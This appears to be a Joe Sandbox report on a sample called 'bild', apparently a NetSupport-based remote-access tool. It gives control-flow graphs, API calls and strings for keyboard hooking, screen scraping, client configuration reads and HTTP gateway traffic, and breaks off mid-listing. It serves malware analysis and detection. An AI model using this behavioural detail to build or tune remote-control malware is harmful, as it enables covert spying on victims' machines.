1102dea5-1102dea8 2417->2421 2424 1102deca-1102ded4 2417->2424 2418->2421 2422 1102e0aa-1102e0cb GetComputerNameA 2418->2422 2430 1102deaa-1102deb1 call 110b7920 2421->2430 2431 1102ded9 2421->2431 2428 1102e103-1102e109 2422->2428 2429 1102e0cd-1102e101 call 11027c30 2422->2429 2424->2422 2438 1102e10b-1102e110 2428->2438 2439 1102e13f-1102e152 call 11164010 2428->2439 2429->2428 2461 1102e157-1102e163 2429->2461 2437 1102dedc-1102dfb6 call 110278e0 call 11027be0 call 110278e0 * 2 LoadLibraryA GetProcAddress 2430->2437 2431->2437 2434->2418 2496 1102e07a-1102e082 SetLastError 2437->2496 2497 1102dfbc-1102dfd3 2437->2497 2444 1102e116-1102e11a 2438->2444 2457 1102e347-1102e36a 2439->2457 2452 1102e136-1102e138 2444->2452 2453 1102e11c-1102e11e 2444->2453 2448 1102dddb-1102dde2 call 11027d60 2445->2448 2449 1102de39 2445->2449 2446->2367 2448->2449 2465 1102dde4-1102de16 2448->2465 2449->2367 2455 1102e13b-1102e13d 2452->2455 2459 1102e132-1102e134 2453->2459 2460 1102e120-1102e126 2453->2460 2455->2439 2455->2461 2470 1102e392-1102e39a 2457->2470 2471 1102e36c-1102e372 2457->2471 2459->2455 2460->2452 2464 1102e128-1102e130 2460->2464 2466 1102e165-1102e17a call 110b7920 call 11029bd0 2461->2466 2467 1102e17c-1102e18f call 11081a70 2461->2467 2464->2444 2464->2459 2487 1102de20-1102de2f call 110f6080 2465->2487 2488 1102de18-1102de1e 2465->2488 2501 1102e1d3-1102e1ec call 11081a70 2466->2501 2485 1102e191-1102e1b4 2467->2485 2486 1102e1b6-1102e1b8 2467->2486 2477 1102e3ac-1102e438 call 111618c1 * 2 call 11146450 * 2 GetCurrentProcessId call 110eddd0 call 11027c90 call 11146450 call 11161d01 2470->2477 2478 1102e39c-1102e3a9 call 11035dd0 call 111618c1 2470->2478 2471->2470 2475 1102e374-1102e38d call 1102d330 2471->2475 2475->2470 2478->2477 2485->2501 2491 1102e1c0-1102e1d1 2486->2491 2492 1102de32-1102de34 call 1102d330 2487->2492 2488->2487 2488->2492 2491->2491 2491->2501 2492->2449 2503 1102e043-1102e04f 2496->2503 2497->2503 2518 1102dfd5-1102dfde 2497->2518 2520 1102e1f2-1102e26d call 11146450 call 110cfc30 call 110d1480 call 110b7920 wsprintfA call 110b7920 wsprintfA 2501->2520 2521 1102e32c-1102e339 call 11164010 2501->2521 2508 1102e092-1102e0a1 2503->2508 2509 1102e051-1102e05d 2503->2509 2508->2422 2516 1102e0a3-1102e0a4 FreeLibrary 2508->2516 2513 1102e06f-1102e073 2509->2513 2514 1102e05f-1102e06d GetProcAddress 2509->2514 2522 1102e084-1102e086 SetLastError 2513->2522 2523 1102e075-1102e078 2513->2523 2514->2513 2516->2422 2518->2503 2524 1102dfe0-1102e016 call 11146450 call 1112b270 2518->2524 2559 1102e283-1102e299 call 11128ec0 2520->2559 2560 1102e26f-1102e27e call 11029450 2520->2560 2538 1102e33c-1102e341 CharUpperA 2521->2538 2526 1102e08c 2522->2526 2523->2526 2524->2503 2542 1102e018-1102e03e call 11146450 call 11027920 2524->2542 2526->2508 2538->2457 2542->2503 2564 1102e2b2-1102e2ec call 110d0bd0 * 2 2559->2564 2565 1102e29b-1102e2ad call 110d0bd0 2559->2565 2560->2559 2572 1102e302-1102e32a call 11164010 call 110d07c0 2564->2572 2573 1102e2ee-1102e2fd call 11029450 2564->2573 2565->2564 2572->2538 2573->2572
                                                                                                      APIs
                                                                                                      • LoadLibraryA.KERNEL32(Wtsapi32.dll,Client,screenscrape,00000001,00000003,TCPIP,ListenPort,00000000,00000003,00000003,?,?,?,?,?,?), ref: 1102DF31
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: LibraryLoad
                                                                                                      • String ID: $14/03/16 10:38:31 V12.10F8$849224$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                                      • API String ID: 1029625771-3461519193
                                                                                                      • Opcode ID: efde7a6f29c4b35a1bc2373ff856d498f8aef1b4f42035034b7e6d706e59a609
                                                                                                      • Instruction ID: 8eab5b2d156e186679f92ce27f1e5cdd209b728942572a9b5b46018c3091c824
                                                                                                      • Opcode Fuzzy Hash: efde7a6f29c4b35a1bc2373ff856d498f8aef1b4f42035034b7e6d706e59a609
                                                                                                      • Instruction Fuzzy Hash: 97C1D275E0026AAFDF22DF959C84BEDF7B9AB44308F9440EDE55867280D770AE80CB51

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 2579 111414a0-111414e1 call 11146450 2582 111414e7-11141543 LoadLibraryA 2579->2582 2583 11141569-11141593 call 11142e80 call 11146ee0 LoadLibraryA 2579->2583 2585 11141545-11141550 call 11017450 2582->2585 2586 11141557-11141560 2582->2586 2595 11141595-1114159b 2583->2595 2596 111415c3 2583->2596 2585->2586 2592 11141552 call 110cc7f0 2585->2592 2586->2583 2587 11141562-11141563 FreeLibrary 2586->2587 2587->2583 2592->2586 2595->2596 2597 1114159d-111415a3 2595->2597 2598 111415cd-111415ed GetClassInfoExA 2596->2598 2597->2596 2601 111415a5-111415c1 call 1105dd10 2597->2601 2599 111415f3-1114161a call 11161d20 call 111444b0 2598->2599 2600 1114168e-111416e6 2598->2600 2610 11141633-11141675 call 111444b0 call 111444e0 LoadCursorA GetStockObject RegisterClassExA 2599->2610 2611 1114161c-11141630 call 11029450 2599->2611 2612 11141722-11141728 2600->2612 2613 111416e8-111416ee 2600->2613 2601->2598 2610->2600 2638 11141677-1114168b call 11029450 2610->2638 2611->2610 2617 11141764-11141786 call 1105dd10 2612->2617 2618 1114172a-11141739 call 1110f420 2612->2618 2613->2612 2615 111416f0-111416f6 2613->2615 2615->2612 2621 111416f8-1114170f call 1112c830 LoadLibraryA 2615->2621 2628 11141794-11141799 2617->2628 2629 11141788-11141792 2617->2629 2632 1114175d 2618->2632 2633 1114173b-1114175b 2618->2633 2621->2612 2637 11141711-1114171d GetProcAddress 2621->2637 2635 111417a5-111417ab 2628->2635 2636 1114179b 2628->2636 2629->2635 2634 1114175f 2632->2634 2633->2634 2634->2617 2639 111417ad-111417b3 call 110f7d00 2635->2639 2640 111417b8-111417d1 call 1113cd80 2635->2640 2636->2635 2637->2612 2638->2600 2639->2640 2647 111417d7-111417dd 2640->2647 2648 11141879-1114188a 2640->2648 2649 111417df-111417f1 call 1110f420 2647->2649 2650 11141819-1114181f 2647->2650 2660 111417f3-11141809 call 1115d6d0 2649->2660 2661 1114180b 2649->2661 2652 11141845-11141851 2650->2652 2653 11141821-11141827 2650->2653 2657 11141853-11141859 2652->2657 2658 11141868-11141873 #17 LoadLibraryA 2652->2658 2655 1114182e-11141840 SetTimer 2653->2655 2656 11141829 call 11134930 2653->2656 2655->2652 2656->2655 2657->2658 2659 1114185b-11141861 2657->2659 2658->2648 2659->2658 2663 11141863 call 1112d6a0 2659->2663 2665 1114180d-11141814 2660->2665 2661->2665 2663->2658 2665->2650
                                                                                                      APIs
                                                                                                      • LoadLibraryA.KERNEL32(User32.dll,00000000,00000000), ref: 111414F3
                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 11141563
                                                                                                      • LoadLibraryA.KERNEL32(imm32,?,?,00000000,00000000), ref: 11141586
                                                                                                      • GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 111415E5
                                                                                                      • _memset.LIBCMT ref: 111415F9
                                                                                                      • LoadCursorA.USER32(00000000,00007F00), ref: 11141649
                                                                                                      • GetStockObject.GDI32(00000000), ref: 11141653
                                                                                                      • RegisterClassExA.USER32(?), ref: 1114166A
                                                                                                      • LoadLibraryA.KERNEL32(pcihooks,?,?,00000000,00000000), ref: 11141702
                                                                                                      • GetProcAddress.KERNEL32(00000000,HookKeyboard), ref: 11141717
                                                                                                      • SetTimer.USER32(00000000,00000000,000003E8,1113CD60), ref: 1114183A
                                                                                                      • #17.COMCTL32(?,?,?,00000000,00000000), ref: 11141868
                                                                                                      • LoadLibraryA.KERNEL32(riched32.dll,?,?,?,00000000,00000000), ref: 11141873
                                                                                                        • Part of subcall function 11017450: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,4764EAAA,1102FCB2,00000000), ref: 1101747E
                                                                                                        • Part of subcall function 11017450: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1101748E
                                                                                                        • Part of subcall function 11017450: GetProcAddress.KERNEL32(00000000,QueueUserWorkItem), ref: 110174D2
                                                                                                        • Part of subcall function 11017450: FreeLibrary.KERNEL32(00000000), ref: 110174F8
                                                                                                        • Part of subcall function 110CC7F0: CreateWindowExA.USER32(00000000,button,11194244,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000000,00000000), ref: 110CC829
                                                                                                        • Part of subcall function 110CC7F0: SetClassLongA.USER32(00000000,000000E8,110CC570), ref: 110CC840
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Library$Load$Class$AddressCreateFreeProc$CursorEventInfoLongObjectRegisterStockTimerWindow_memset
                                                                                                      • String ID: *quiet$HookKeyboard$InitUI (%d)$NSMGetAppIcon()$NSMWClass$TraceCopyData$UI.CPP$User32.dll$View$_License$_debug$imm32$pcihooks$riched32.dll
                                                                                                      • API String ID: 3706574701-3145203681
                                                                                                      • Opcode ID: bf77d67e3ec3500b8f2db5927d4705f1cc154319e5a682cee20025d48f6291c1
                                                                                                      • Instruction ID: 9b294397b9efa9119a6c3372e39ca87a41eafe2d9b680e3b49ce131b24699399
                                                                                                      • Opcode Fuzzy Hash: bf77d67e3ec3500b8f2db5927d4705f1cc154319e5a682cee20025d48f6291c1
                                                                                                      • Instruction Fuzzy Hash: 6EA19DB4E0126AAFDB01DFE9C9C4AADFBB4FB4870DB60413EE52997644EB306440CB55

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 2668 6c7563c0-6c756402 call 6c774710 EnterCriticalSection InterlockedDecrement 2671 6c7565ed-6c756608 LeaveCriticalSection call 6c7728e1 2668->2671 2672 6c756408-6c75641f EnterCriticalSection 2668->2672 2674 6c756425-6c756431 2672->2674 2675 6c7564da-6c7564e0 2672->2675 2677 6c756443-6c756447 2674->2677 2678 6c756433-6c756441 GetProcAddress 2674->2678 2679 6c7564e6-6c7564f0 shutdown 2675->2679 2680 6c7565bd-6c7565e8 call 6c771c50 LeaveCriticalSection 2675->2680 2681 6c75644e-6c756450 SetLastError 2677->2681 2682 6c756449-6c75644c 2677->2682 2678->2677 2683 6c7564f2-6c756507 GetLastError call 6c7530a0 2679->2683 2684 6c75650a-6c75652d timeGetTime #16 2679->2684 2680->2671 2687 6c756456-6c756465 2681->2687 2682->2687 2683->2684 2689 6c75656c-6c75656e 2684->2689 2690 6c75652f 2684->2690 2693 6c756477-6c75647b 2687->2693 2694 6c756467-6c756475 GetProcAddress 2687->2694 2691 6c756570-6c75657b closesocket 2689->2691 2696 6c756551-6c75656a #16 2690->2696 2697 6c756531 2690->2697 2699 6c7565b6 2691->2699 2700 6c75657d-6c75658a WSAGetLastError 2691->2700 2701 6c756482-6c756484 SetLastError 2693->2701 2702 6c75647d-6c756480 2693->2702 2694->2693 2696->2689 2696->2690 2697->2696 2698 6c756533-6c75653e GetLastError 2697->2698 2698->2689 2703 6c756540-6c756547 timeGetTime 2698->2703 2699->2680 2705 6c756594-6c756598 2700->2705 2706 6c75658c-6c75658e Sleep 2700->2706 2704 6c75648a-6c756499 2701->2704 2702->2704 2703->2689 2707 6c756549-6c75654b Sleep 2703->2707 2708 6c7564ab-6c7564af 2704->2708 2709 6c75649b-6c7564a9 GetProcAddress 2704->2709 2705->2691 2710 6c75659a-6c75659c 2705->2710 2706->2705 2707->2696 2712 6c7564b1-6c7564be 2708->2712 2713 6c7564c3-6c7564d5 SetLastError 2708->2713 2709->2708 2710->2699 2714 6c75659e-6c7565b3 GetLastError call 6c7530a0 2710->2714 2712->2680 2713->2680 2714->2699
                                                                                                      APIs
                                                                                                      • EnterCriticalSection.KERNEL32(6C79B898,00000000,?,00000000,?,6C75D77B,00000000), ref: 6C7563E8
                                                                                                      • InterlockedDecrement.KERNEL32(-0003F3B7), ref: 6C7563FA
                                                                                                      • EnterCriticalSection.KERNEL32(-0003F3CF,?,00000000,?,6C75D77B,00000000), ref: 6C756412
                                                                                                      • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6C75643B
                                                                                                      • SetLastError.KERNEL32(00000078,?,00000000,?,6C75D77B,00000000), ref: 6C756450
                                                                                                      • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6C75646F
                                                                                                      • SetLastError.KERNEL32(00000078,?,00000000,?,6C75D77B,00000000), ref: 6C756484
                                                                                                      • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6C7564A3
                                                                                                      • SetLastError.KERNEL32(00000078,?,00000000,?,6C75D77B,00000000), ref: 6C7564C5
                                                                                                      • shutdown.WSOCK32(?,00000001,?,00000000,?,6C75D77B,00000000), ref: 6C7564E9
                                                                                                      • GetLastError.KERNEL32(?,00000001,?,00000000,?,6C75D77B,00000000), ref: 6C7564F2
                                                                                                      • timeGetTime.WINMM(?,00000001,?,00000000,?,6C75D77B,00000000), ref: 6C756510
                                                                                                      • #16.WSOCK32(?,?,00001000,00000000,?,00000000,?,6C75D77B,00000000), ref: 6C756526
                                                                                                      • GetLastError.KERNEL32(?,?,00001000,00000000,?,00000000,?,6C75D77B,00000000), ref: 6C756533
                                                                                                      • timeGetTime.WINMM(?,00000000,?,6C75D77B,00000000), ref: 6C756540
                                                                                                      • Sleep.KERNEL32(00000001,?,00000000,?,6C75D77B,00000000), ref: 6C75654B
                                                                                                      • #16.WSOCK32(?,?,00001000,00000000,?,?,00001000,00000000,?,00000000,?,6C75D77B,00000000), ref: 6C756563
                                                                                                      • closesocket.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,6C75D77B,00000000), ref: 6C756574
                                                                                                      • WSAGetLastError.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,6C75D77B,00000000), ref: 6C75657D
                                                                                                      • Sleep.KERNEL32(00000032,?,?,?,00001000,00000000,?,00000000,?,6C75D77B,00000000), ref: 6C75658E
                                                                                                      • GetLastError.KERNEL32(?,?,?,00001000,00000000,?,00000000,?,6C75D77B,00000000), ref: 6C75659E
                                                                                                      • _memset.LIBCMT ref: 6C7565C8
                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,6C75D77B,00000000), ref: 6C7565D7
                                                                                                      • LeaveCriticalSection.KERNEL32(6C79B898,?,00000000,?,6C75D77B,00000000), ref: 6C7565F2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3511114217.000000006C751000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C750000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3511098641.000000006C750000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511143904.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511160154.000000006C799000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511206673.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_6c750000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$CriticalSection$AddressProc$EnterLeaveSleepTimetime$DecrementInterlocked_memsetclosesocketshutdown
                                                                                                      • String ID: CloseGatewayConnection - closesocket(%u) FAILED (%d)$CloseGatewayConnection - shutdown(%u) FAILED (%d)$InternetCloseHandle
                                                                                                      • API String ID: 3764039262-2631155478
                                                                                                      • Opcode ID: fb51b3f8d9546956e595cd39833c6cd002197fa7958b54f70c26425944c3a29f
                                                                                                      • Instruction ID: 02dc120cf50b6b978d5281b5f89e705de18627ae2c20e4d2929620017030297e
                                                                                                      • Opcode Fuzzy Hash: fb51b3f8d9546956e595cd39833c6cd002197fa7958b54f70c26425944c3a29f
                                                                                                      • Instruction Fuzzy Hash: FB51B072640344AFDB10EF68CA88B5673B9AF4D315F500538E91AD7B84EF70EA95CB60

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 2718 6c7598d0-6c759932 2719 6c759934-6c759955 call 6c7530a0 call 6c7728e1 2718->2719 2720 6c759956-6c75995e 2718->2720 2721 6c759ac5-6c759acc 2720->2721 2722 6c759964-6c759979 call 6c7728f0 2720->2722 2726 6c759ace-6c759adb 2721->2726 2727 6c759b19-6c759b1d 2721->2727 2722->2721 2738 6c75997f-6c759994 call 6c774330 2722->2738 2732 6c759add-6c759af6 wsprintfA 2726->2732 2733 6c759af8-6c759b07 wsprintfA 2726->2733 2728 6c759b1f-6c759b26 2727->2728 2729 6c759b4b-6c759b70 GetTickCount InterlockedExchange EnterCriticalSection 2727->2729 2728->2729 2734 6c759b28-6c759b41 call 6c7577b0 2728->2734 2736 6c759b72-6c759b9b LeaveCriticalSection call 6c7530a0 call 6c7728e1 2729->2736 2737 6c759b9c-6c759ba1 2729->2737 2739 6c759b0a-6c759b16 call 6c7552b0 2732->2739 2733->2739 2734->2729 2753 6c759b43-6c759b45 2734->2753 2743 6c759ba3-6c759bd0 call 6c754dd0 2737->2743 2744 6c759bfb-6c759c05 2737->2744 2738->2721 2758 6c75999a-6c7599af call 6c7728f0 2738->2758 2739->2727 2766 6c759bd6-6c759bf6 WSAGetLastError call 6c7530a0 2743->2766 2767 6c759d4b-6c759d6c LeaveCriticalSection call 6c7677e0 2743->2767 2747 6c759c07-6c759c17 2744->2747 2748 6c759c3b-6c759c47 2744->2748 2754 6c759c20-6c759c22 2747->2754 2755 6c759c19-6c759c1d 2747->2755 2757 6c759c50-6c759c5a 2748->2757 2753->2729 2754->2748 2763 6c759c24-6c759c36 call 6c7546c0 2754->2763 2755->2754 2762 6c759c1f 2755->2762 2760 6c759c60-6c759c65 2757->2760 2761 6c759d2e-6c759d3b call 6c7530a0 2757->2761 2758->2721 2780 6c7599b5-6c7599f1 2758->2780 2769 6c759c67-6c759c6b 2760->2769 2770 6c759c71-6c759c9a send 2760->2770 2784 6c759d45 2761->2784 2762->2754 2763->2748 2766->2767 2785 6c759d6e-6c759d72 InterlockedIncrement 2767->2785 2786 6c759d78-6c759d8a call 6c7728e1 2767->2786 2769->2761 2769->2770 2776 6c759cf1-6c759d0f call 6c7530a0 2770->2776 2777 6c759c9c-6c759c9f 2770->2777 2776->2784 2782 6c759ca1-6c759cac 2777->2782 2783 6c759cbe-6c759cce WSAGetLastError 2777->2783 2787 6c7599f7-6c7599ff 2780->2787 2782->2784 2791 6c759cb2-6c759cbc 2782->2791 2788 6c759d11-6c759d2c call 6c7530a0 2783->2788 2789 6c759cd0-6c759ce9 timeGetTime Sleep 2783->2789 2784->2767 2785->2786 2793 6c759a05-6c759a08 2787->2793 2794 6c759aa3-6c759ac2 call 6c7530a0 2787->2794 2788->2784 2789->2757 2800 6c759cef 2789->2800 2791->2789 2796 6c759a0e 2793->2796 2797 6c759a0a-6c759a0c 2793->2797 2794->2721 2801 6c759a14-6c759a1d 2796->2801 2797->2801 2800->2784 2804 6c759a8d-6c759a8e 2801->2804 2805 6c759a1f-6c759a22 2801->2805 2804->2794 2806 6c759a24 2805->2806 2807 6c759a26-6c759a35 2805->2807 2806->2807 2808 6c759a37-6c759a3a 2807->2808 2809 6c759a90-6c759a93 2807->2809 2811 6c759a3c 2808->2811 2812 6c759a3e-6c759a4d 2808->2812 2810 6c759a9d 2809->2810 2810->2794 2811->2812 2813 6c759a95-6c759a98 2812->2813 2814 6c759a4f-6c759a52 2812->2814 2813->2810 2815 6c759a54 2814->2815 2816 6c759a56-6c759a65 2814->2816 2815->2816 2817 6c759a67-6c759a6a 2816->2817 2818 6c759a9a 2816->2818 2819 6c759a6c 2817->2819 2820 6c759a6e-6c759a85 2817->2820 2818->2810 2819->2820 2820->2787 2821 6c759a8b 2820->2821 2821->2794
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3511114217.000000006C751000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C750000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3511098641.000000006C750000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511143904.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511160154.000000006C799000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511206673.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_6c750000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: _strncmp
                                                                                                      • String ID: %02x %02x$%s$3'$CMD=NC_DATA$Error %d sending HTTP request on connection %d$Error %d writing inet request on connection %d$Error send returned 0 on connection %d$NC_DATA$SendHttpReq failed, not connected to gateway!$abort send, gateway hungup$xx %02x
                                                                                                      • API String ID: 909875538-2848211065
                                                                                                      • Opcode ID: 2e9105860f277875c32a65511904811306bb8eb7447228b6aee3b30ea9b37bbf
                                                                                                      • Instruction ID: 871b3126e4f3f138cbeec75bad1c4dda96487372a3b944b68224fdb57d3b6ee6
                                                                                                      • Opcode Fuzzy Hash: 2e9105860f277875c32a65511904811306bb8eb7447228b6aee3b30ea9b37bbf
                                                                                                      • Instruction Fuzzy Hash: 62D1F5B5E002149FDF20CF24CA89BD9B775AF1A308F4441E9D80D9B641DF31999ACF61

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 2822 110285f0-1102860d 2823 11028613-11028642 2822->2823 2824 11028cd8-11028cdf 2822->2824 2825 110286d0-11028718 GetModuleFileNameA call 111631f0 call 11163fed 2823->2825 2826 11028648-1102864e 2823->2826 2827 11028cf1-11028cf5 2824->2827 2828 11028ce1-11028cea 2824->2828 2842 1102871d 2825->2842 2830 11028650-11028658 2826->2830 2832 11028cf7-11028d09 call 11161d01 2827->2832 2833 11028d0a-11028d1e call 11161d01 2827->2833 2828->2827 2831 11028cec 2828->2831 2830->2830 2837 1102865a-11028660 2830->2837 2831->2827 2841 11028663-11028668 2837->2841 2841->2841 2843 1102866a-11028674 2841->2843 2844 11028720-1102872a 2842->2844 2845 11028691-11028697 2843->2845 2846 11028676-1102867d 2843->2846 2848 11028730-11028733 2844->2848 2849 11028ccf-11028cd7 2844->2849 2847 11028698-1102869e 2845->2847 2850 11028680-11028686 2846->2850 2847->2847 2852 110286a0-110286ce call 11163fed 2847->2852 2848->2849 2853 11028739-11028747 call 11026890 2848->2853 2849->2824 2850->2850 2851 11028688-1102868e 2850->2851 2851->2845 2852->2844 2858 11028c55-11028c6a call 11163db7 2853->2858 2859 1102874d-11028760 call 11162de7 2853->2859 2858->2849 2866 11028c70-11028cca 2858->2866 2864 11028762-11028765 2859->2864 2865 1102876b-11028793 call 11026700 call 11026890 2859->2865 2864->2858 2864->2865 2865->2858 2871 11028799-110287b6 call 11026980 call 11026890 2865->2871 2866->2849 2876 11028bc5-11028bcc 2871->2876 2877 110287bc 2871->2877 2878 11028bf2-11028bf9 2876->2878 2879 11028bce-11028bd1 2876->2879 2880 110287c0-110287e0 call 11026700 2877->2880 2883 11028c11-11028c18 2878->2883 2884 11028bfb-11028c01 2878->2884 2879->2878 2882 11028bd3-11028bda 2879->2882 2890 110287e2-110287e5 2880->2890 2891 11028816-11028819 2880->2891 2888 11028be0-11028bf0 2882->2888 2886 11028c1a-11028c25 2883->2886 2887 11028c28-11028c2f 2883->2887 2889 11028c07-11028c0f 2884->2889 2886->2887 2892 11028c31-11028c3b 2887->2892 2893 11028c3e-11028c45 2887->2893 2888->2878 2888->2888 2889->2883 2889->2889 2894 110287e7-110287ee 2890->2894 2895 110287fe-11028801 2890->2895 2897 11028bae-11028bbf call 11026890 2891->2897 2898 1102881f-11028832 call 11164150 2891->2898 2892->2893 2893->2858 2896 11028c47-11028c52 2893->2896 2899 110287f4-110287fc 2894->2899 2895->2897 2900 11028807-11028811 2895->2900 2896->2858 2897->2876 2897->2880 2898->2897 2905 11028838-11028854 call 111646ce 2898->2905 2899->2895 2899->2899 2900->2897 2908 11028856-1102885c 2905->2908 2909 1102886f-11028885 call 111646ce 2905->2909 2911 11028860-11028868 2908->2911 2914 11028887-1102888d 2909->2914 2915 1102889f-110288b5 call 111646ce 2909->2915 2911->2911 2912 1102886a 2911->2912 2912->2897 2916 11028890-11028898 2914->2916 2920 110288b7-110288bd 2915->2920 2921 110288cf-110288e5 call 111646ce 2915->2921 2916->2916 2918 1102889a 2916->2918 2918->2897 2922 110288c0-110288c8 2920->2922 2926 110288e7-110288ed 2921->2926 2927 110288ff-11028915 call 111646ce 2921->2927 2922->2922 2924 110288ca 2922->2924 2924->2897 2928 110288f0-110288f8 2926->2928 2932 11028917-1102891d 2927->2932 2933 1102892f-11028945 call 111646ce 2927->2933 2928->2928 2930 110288fa 2928->2930 2930->2897 2934 11028920-11028928 2932->2934 2938 11028947-1102894d 2933->2938 2939 